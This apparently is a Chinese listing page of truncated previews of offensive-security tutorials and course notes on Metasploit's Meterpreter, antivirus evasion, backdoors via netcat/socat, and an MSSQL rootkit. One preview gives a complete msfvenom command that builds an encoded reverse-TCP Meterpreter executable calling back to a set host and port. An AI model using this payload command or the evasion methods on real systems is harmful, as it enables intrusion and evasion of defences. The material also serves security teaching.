Meterpreter

MSF使用之meterpreter模块

一、简介 Meterpreter是Metasploit提供的一个非常强大的后渗透工具 Meterpreter可以看成特殊的Payload,之前我们的Payload都是为了获得目标系统的shell 这里的payload就是shellcode,以获得目标系统的shell为目的的payload 我们获得的shell有些缺陷,仅利用shell来收集更多的信息、做更...

20169205 2016-2017-2 《网络攻防技术》第7周学习总结

20169205 2016-2017-2 《网络攻防技术》第7周学习总结 教材学习内容总结 课本第七章主要围绕windows操作系统安全攻防技术进行讲述,教材中主要涉及的攻击内容如下: Windows操作系统的基本结构 运行于处理器特权模式的操作系统内核 运行在处理器非特权模式的用户空间代码 采用宏内核模式来进行构架 Windows操作系统内核...

20145322《网络对抗技术》免杀原理与实践

20145322《网络对抗技术》免杀原理与实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。 (2)免杀是做什么? 通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳,或用其他...

MSSQL无落地文件执行Rootkit-WarSQLKit

0x00 前言 在本文中,我们将处理一个很长时间以来一直待解决的问题:MSSQL Rootkit。到目前为止,针对MS-SQL所描述的大多数命令执行都是调用“xp_cmdshell”和“sp_OACreate”存储过程的。因此,如果在没有xp_cmdshell和sp_OACreate存储过程的MSSQL服务器上拥有“sa”帐户或任何具有“sysadmin”...

kali之msfconsole

1.启动msfconsole命令模式2.msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.106 LPORT=1234 -f exe > ./test.exe3.启动msfconsole命令模式 use exploit/mult...

Python脚本与Metasploit交互攻击

Metasploit是一款强大的漏洞扫描和利用工具,编写Python脚本与Metasploit进行交互,可以自动化的扫描和利用漏洞。 相关文章:Metasploit框架的使用 在脚本中,我们首选需要利用 nmap 模块扫描目标主机是否开放了445端口,我们写了一个 findTarget()函数,来扫描给定ip或者给定网段中开放了目标端口的主机,返回开放了4...

《网络对抗技术》Exp2 后门原理与实践

Exp2 后门原理与实践 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划启动 (3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell (4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头...

免杀工具汇总

今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC   可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序: Sc :是将 msf 生成的 raw...